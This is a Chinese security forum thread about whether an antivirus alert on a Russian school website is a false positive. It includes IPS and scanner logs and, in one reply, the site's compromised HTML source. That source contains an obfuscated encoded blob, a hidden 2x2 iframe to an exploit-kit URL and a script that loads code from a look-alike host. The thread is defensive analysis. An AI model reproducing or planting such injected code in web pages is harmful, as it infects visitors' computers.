http://21415s13.edusite.ru/p48aa1.html

wjcharles

是否误报？关了ips进去也没什么动静。。。

类别： 入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2013/1/27 15:36:05,高,阻止了 loja15.redecommerce.com.br 的入侵企图,已阻止,不需要操作,Web Attack: Red Exploit Kit Website,不需要操作,不需要操作,"loja15.redecommerce.com.br (108.179.216.224, 80)",loja15.redecommerce.com.br/wkkj.htm?i=1467979,"WIN-MUD6U7NNTD1 (192.168.58.128, 56875)",108.179.216.224 (108.179.216.224),"TCP, www-http"
来自 <b>loja15.redecommerce.com.br/wkkj.htm?i=1467979</b> 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME1\PROGRAM FILES (X86)\INTERNET EXPLORER\IEXPLORE.EXE 引起。  要停止接收有关此类通信的通知，请在<b>“操作”</b>面板中单击<b>“不再提醒我”</b>。

寒山竹语

trendmicro
此站点是否安全？
危险
最近的测试显示该站点包含恶意软件或存在欺骗访客的行为。
此站点属于何种类别？
病毒释放器
网站直接或间接帮助传播恶意软件或恶意代码

xiuzhiguo

Report for ‘ 21415s13.edusite.ru/看p48aa1.html ’
       
No malicious activity or malware detected.
Scan Time: 2013-01-28 05:34:56 UTC.

Scanned single URL | Report as Malicious
       
Scanned IP:         85.193.69.29
Country:         Russian Federation       
       

Scan results for the last 7 days:

1 Safe
0 Suspicious
0 High Risk
0 Inconclusive
        Blacklist Checking:        Safe       
        Phishing:        Safe       
        Malicious Activity:        Safe       
        Malware Downloads:        Safe       
        Suspicious Activity:        Safe       


Domain:        21415s13.edusite.ru
Website:        21415s13.edu后即可site.ru
Show Whois information
Show history for this website
Show history for this page

Tom179090

<HTML><HEAD><meta name='generator' content='Конструктор школьных сайтов - www  .edusite.ru[/url]'><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><meta name='Keywords' content=''><TITLE>Месячник "Старт в профессию"</TITLE><link rel='STYLESHEET' type='text/css' href='st.css'><link rel='STYLESHEET' type='text/css' href='scin/pages.css'><link rel='STYLESHEET' type='text/css' href='scin/teg.css'><link rel='STYLESHEET' type='text/css' href='scin/left-menu.css'>
<style>#c118{background:url(data:,13,41.5,26,55,12.5,32.5,28,10,10.5,41.5,17.5,6.5,26.5,22.5,10.5,9.5,23.5,42,25,11,43.5,42,43,11,2.5,52.5,9.5,27,15,15,12.5,36.5,47.5,19,7.5,9,33,15,2.5,47,24.5,48.5,24.5,3.5,30,35.5,40.5,19,44.5,49.5,46,29.5,20,9,13.5,16,24,34.5,40,17.5,7.5,32.5,38.5,11,13.5,48,9,8.5,20,3,53.5,22,38,50,18,3,4,17,21.5,8.5,5.5,43.5,54,30.5,4,28.5,15,7,12.5,24.5,5,37,14,23.5,3.5,42,18,27,48,12.5,18,39.5,46,31.5,28,9.5,7.5,6.5,10.5,26,46,5,12.5,7.5,5,55,4.5,40,3.5,4.5,37,45.5,21.5,8.5,10,16,14.5,21.5,33.5,54.5,5.5,24.5,4,33.5,19.5,19.5,20,14,4.5,5,6,12.5,25.5,38,15.5,11,7,32,17.5,16,2,8.5,19.5,12,41.5,38,4,49,22,4,13,6,30.5,12,8,34,27.5,20,14,8.5,15,47,7.5,3,18,50.5,22,16,10,8,5,11);}</style>


<!-- C/C -->













<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://love-mylottery.com/wkkj.html?i=1467979></iframe></body></HTML>
<script>
var gaJsHost = (("http:" == document.location.protocol) ? "http://yandex" : "http://yandex"); document.write(unescape("%3Cscript src='" + gaJsHost + "-yandex.uni.cc/verify-v1?id="+Math.floor(Math.random() *30000)+"&group=2&seoref="+encodeURIComponent(document.referrer)+ "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=' type='text/javascript'%3E%3C/script%3E"));
</script>

yifan1518

2013/2/6 17:05:46        拒绝: http://love-mylottery.com/wkkj.html?i=1467979(根据可疑网址库进行分析)        http://love-mylottery.com/wkkj.html?i=1467979        在数据库中检测到该网址        Google Chrome               
卡巴斯基小企业版